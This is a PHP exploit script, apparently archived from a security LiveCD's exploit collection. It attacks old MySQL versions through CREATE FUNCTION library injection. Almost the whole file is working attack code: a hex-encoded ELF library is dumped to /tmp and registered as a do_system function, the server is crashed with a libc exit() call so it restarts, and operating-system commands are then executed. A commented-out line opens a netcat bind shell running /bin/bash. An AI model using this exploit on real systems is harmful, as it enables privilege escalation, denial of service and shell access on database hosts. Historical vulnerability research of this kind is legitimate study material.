home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / database / mysql / mysqlcreate.php < prev    next >
PHP Script  |  2005-03-16  |  10KB  |  183 lines
  1. <?
  2. /*************************************
  3. ** Mysql CREATE FUNCTION func table arbitrary library injection
  4. **
  5. ** Author: Stefano Di Paola
  6. ** Vulnerable: Mysql <= 4.0.23, 4.1.10 
  7. ** Type of Vulnerability: Local/Remote Privileges Escalation - input validation
  8. ** Tested On : Mandrake 10.1 /Debian Sarge
  9. ** Vendor Status: Notified on March 2005
  10. **
  11. ** Copyright 2005 Stefano Di Paola (stefano.dipaola@wisec.it)
  12. **
  13. ** 
  14. ** Disclaimer:
  15. ** In no event shall the author be liable for any damages 
  16. ** whatsoever arising out of or in connection with the use 
  17. ** or spread of this information. 
  18. ** Any use of this information is at the user's own risk.
  19. **
  20. **
  21. *************************************
  22. */
  23.  
  24.  
  25. // this is the MySql root password.
  26. $pass='useyoupasswordhere';
  27.  
  28. function mysql_create_db($db,$link)
  29. {
  30. $query="CREATE database $db;";
  31. return mysql_query($query, $link) ;
  32.  
  33. }
  34. // the library in little endian hex. (from NGS's Hackproofing_MySql 
  35. // http://www.nextgenss.com/papers/HackproofingMySQL.pdf )
  36. $solib="0x7f454c4601010100000000000000000003000300010000002006000034000000340a00000000 \
  37. 00003400200004002800160015000100000000000000000000000000000094070000940700000500000000 \
  38. 1000000100000094070000941700009417000004010000080100000600000000100000020000009c070000 \
  39. 9c1700009c170000c8000000c8000000060000000400000051e57464000000000000000000000000000000 \
  40. 00000000000600000004000000250000002800000000000000260000000000000000000000000000000000 \
  41. 00000000000022000000270000000000000000000000000000000000000000000000000000000000000000 \
  42. 00000000000000230000001e00000000000000000000000000000000000000000000002000000000000000 \
  43. 00000000000000000000000021000000250000000000000000000000000000002400000000000000000000 \
  44. 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000 \
  45. 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000 \
  46. 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000 \
  47. 000000001c000000000000001f000000000000001d00000000000000000000000000000000000000000000 \
  48. 0000000000b4000000000000000300010000000000f0010000000000000300020000000000700400000000 \
  49. 00000300030000000000100500000000000003000400000000006005000000000000030005000000000090 \
  50. 050000000000000300060000000000c0050000000000000300070000000000d00500000000000003000800 \
  51. 00000000e8050000000000000300090000000000200600000000000003000a000000000074070000000000 \
  52. 0003000b0000000000900700000000000003000c0000000000941700000000000003000d00000000009c17 \
  53. 00000000000003000e0000000000641800000000000003000f00000000006c180000000000000300100000 \
  54. 00000074180000000000000300110000000000781800000000000003001200000000009818000000000000 \
  55. 03001300000000000000000000000000030014000000000000000000000000000300150000000000000000 \
  56. 00000000000300160000000000000000000000000003001700000000000000000000000000030018000000 \
  57. 000000000000000000000300190000000000000000000000000003001a0000000000000000000000000003 \
  58. 001b00010000009c170000000000001100f1ff610000000000000076000000120000002f000000d0050000 \
  59. 00000000120008007900000098180000000000001000f1ff35000000740700000000000012000b003b0000 \
  60. 000000000097000000220000005e000000080700003600000012000a007200000098180000000000001000 \
  61. f1ff0a00000078180000000000001100f1ff850000009c180000000000001000f1ff4a0000000000000000 \
  62. 0000002000000020000000000000000000000020000000005f44594e414d4943005f474c4f42414c5f4f46 \
  63. 465345545f5441424c455f005f5f676d6f6e5f73746172745f5f005f696e6974005f66696e69005f5f6378 \
  64. 615f66696e616c697a65005f4a765f5265676973746572436c617373657300646f5f73797374656d006c69 \
  65. 62632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e312e33 \
  66. 00474c4942435f322e30000000000000000000000000000000000000000000000000000000000000000000 \
  67. 00000000000000000000000000000000000000000000000001000200010001000100030001000100010001 \
  68. 000000000001000200680000001000000000000000731f6909000003008a000000100000001069690d0000 \
  69. 02009600000000000000941700000800000098170000080000002b070000021d00008c1800000621000090 \
  70. 180000062600009418000006270000841800000721000088180000072600005589e583ec08e845000000e8 \
  71. e0000000e85b010000c9c300ffb304000000ffa30800000000000000ffa30c0000006800000000e9e0ffff \
  72. ffffa3100000006808000000e9d0ffffff00000000000000005589e553e8000000005b81c34f120000528b \
  73. 831c00000085c07402ffd0585bc9c39090909090909090909090909090905589e553e8000000005b81c31f \
  74. 1200005180bb200000000075348b931400000085d2752f8b8320ffffff8b1085d2741783c004898320ffff \
  75. ffffd28b8320ffffff8b1085d275e9c68320000000018b5dfcc9c383ec0c8b831cffffff50e846ffffff83 \
  76. c410ebbd89f68dbc27000000005589e553e8000000005b81c3af110000508b83fcffffff85c0740a8b8318 \
  77. 00000085c0750b8b5dfcc9c38db60000000083ec0c8d83fcffffff50e809ffffff83c4108b5dfcc9c39055 \
  78. 89e583ec088b450c8338017409c745fc00000000eb1a83ec0c8b450c8b4008ff30e8fcffffff83c410c745 \
  79. fc000000008b45fcc9c390905589e55653e8000000005b81c32e1100008d83f0ffffff8d70fc8b40fc83f8 \
  80. ff740c83ee04ffd08b0683f8ff75f45b5e5dc390905589e553e8000000005b81c3fb10000050e8c6feffff \
  81. 595bc9c3000000000000941700007018000001000000680000000c000000d00500000d0000007407000004 \
  82. 000000b4000000050000007004000006000000f00100000a000000a00000000b0000001000000003000000 \
  83. 781800000200000010000000140000001100000017000000c0050000110000009005000012000000300000 \
  84. 0013000000080000001600000000000000feffff6f60050000ffffff6f01000000f0ffff6f10050000faff \
  85. ff6f0200000000000000000000000000000000000000000000000000000000000000000000000000000000 \
  86. 000000ffffffff00000000ffffffff00000000000000009c1700000000000000000000fe0500000e060000 \
  87. 000000000000000000000000004743433a2028474e552920332e332e3120284d616e6472616b65204c696e \
  88. 757820392e3220332e332e312d316d646b2900004743433a2028474e552920332e332e3120284d616e6472 \
  89. 616b65204c696e757820392e3220332e332e312d326d646b2900004743433a2028474e552920332e332e31 \
  90. 20284d616e6472616b65204c696e757820392e3220332e332e312d326d646b2900004743433a2028474e55 \
  91. 2920332e332e3120284d616e6472616b65204c696e757820392e3220332e332e312d326d646b2900004743 \
  92. 433a2028474e552920332e332e3120284d616e6472616b65204c696e757820392e3220332e332e312d316d \
  93. 646b2900002e7368737472746162002e68617368002e64796e73796d002e64796e737472002e676e752e76 \
  94. 657273696f6e002e676e752e76657273696f6e5f72002e72656c2e64796e002e72656c2e706c74002e696e \
  95. 6974002e74657874002e66696e69002e65685f6672616d65002e64617461002e64796e616d6963002e6374 \
  96. 6f7273002e64746f7273002e6a6372002e676f74002e627373002e636f6d6d656e74000000000000000000 \
  97. 000000000000000000000000000000000000000000000000000000000000000000000b0000000500000002 \
  98. 000000b4000000b40000003c01000002000000000000000400000004000000110000000b00000002000000 \
  99. f0010000f001000080020000030000001c0000000400000010000000190000000300000002000000700400 \
  100. 0070040000a00000000000000000000000010000000000000021000000ffffff6f02000000100500001005 \
  101. 000050000000020000000000000002000000020000002e000000feffff6f02000000600500006005000030 \
  102. 000000030000000100000004000000000000003d0000000900000002000000900500009005000030000000 \
  103. 02000000000000000400000008000000460000000900000002000000c0050000c005000010000000020000 \
  104. 000900000004000000080000004f0000000100000006000000d0050000d005000017000000000000000000 \
  105. 000004000000000000004a0000000100000006000000e8050000e805000030000000000000000000000004 \
  106. 00000004000000550000000100000006000000200600002006000054010000000000000000000010000000 \
  107. 000000005b000000010000000600000074070000740700001a000000000000000000000004000000000000 \
  108. 00610000000100000002000000900700009007000004000000000000000000000004000000000000006b00 \
  109. 00000100000003000000941700009407000008000000000000000000000004000000000000007100000006 \
  110. 000000030000009c1700009c070000c8000000030000000000000004000000080000007a00000001000000 \
  111. 03000000641800006408000008000000000000000000000004000000000000008100000001000000030000 \
  112. 006c1800006c08000008000000000000000000000004000000000000008800000001000000030000007418 \
  113. 00007408000004000000000000000000000004000000000000008d00000001000000030000007818000078 \
  114. 08000020000000000000000000000004000000040000009200000008000000030000009818000098080000 \
  115. 04000000000000000000000004000000000000009700000001000000000000000000000098080000fa0000 \
  116. 00000000000000000001000000000000000100000003000000000000000000000092090000a00000000000 \
  117. 0000000000000100000000000000";
  118.  
  119. $link=mysql_connect("127.0.0.1","root",$pass);
  120. if (!$link) {
  121. die('Could not connect: ' . mysql_error());
  122. }
  123. echo "Connected successfully as root\n";
  124. echo "creating db for lib\n";
  125. mysql_create_db('my_db',$link) or print ('cannot create my_db db, sorry!');
  126. echo "done....\n";
  127. echo "selecting db for lib\n";
  128. mysql_select_db('my_db') or print ('cannot use my_db db, sorry!');
  129. echo "done....\n";
  130.  
  131. echo "creating blob table for lib\n";
  132. $query="CREATE TABLE blob_tab (blob_col BLOB);";
  133. $result = mysql_query($query, $link) or print("cannot create blob table for lib\n");
  134. echo "done....\n";
  135.  
  136. echo "inserting blob table for lib\n";
  137. $query="INSERT into blob_tab values (CONVERT($solib,CHAR));";
  138. $result = mysql_query($query, $link) or print("cannot insert blob for lib\n");
  139. echo "done....\n";
  140.  
  141. echo "dumping lib in /tmp/libso.so.0...\n";
  142. $query="SELECT blob_col FROM blob_tab INTO DUMPFILE '/tmp/libso.so.0';";
  143. $result = mysql_query($query, $link) or print("cannot dump lib\n");
  144. echo " done....\n";
  145.  
  146. mysql_select_db('mysql') or die ('cannot use mysql db, sorry!');
  147. echo "sending lib....\n";
  148.  
  149. $query="insert into func (name,dl) values ('do_system','/tmp/libso.so.0');";
  150. $result = mysql_query($query, $link);
  151. echo "done....\n";
  152. echo "Creating exit function to restart server\n";
  153.  
  154. $query="create function exit returns integer soname 'libc.so.6';";
  155. $result = mysql_query($query, $link) or print ("cannot create exit, sorry!\n");
  156. echo "done....\n";
  157. echo "Selecting exit function\n";
  158.  
  159. $query="select exit();";
  160. $result = mysql_query($query, $link);
  161. echo "done!\nWaiting for server to restart\n";
  162.  
  163. sleep(1);
  164.  
  165. $link=mysql_connect("127.0.0.1","root",$pass);
  166. if (!$link) {
  167. die('Could not connect: ' . mysql_error());
  168. }
  169. echo "Connected to MySql server again...\n";
  170.  
  171. //$cmd ='/usr/sbin/nc -l -p 8000 -e /bin/bash';
  172. $cmd ='id >/tmp/id';
  173. echo "Sending Command...$cmd\n";
  174. $query="select do_system('$cmd');";
  175. $result = mysql_query($query, $link);
  176. echo "done!\n";
  177. echo "Now use your fav shell and ls /tmp/id -l \n";
  178. mysql_close($link);
  179.  
  180. ?>
  181.  
  182.  
  183.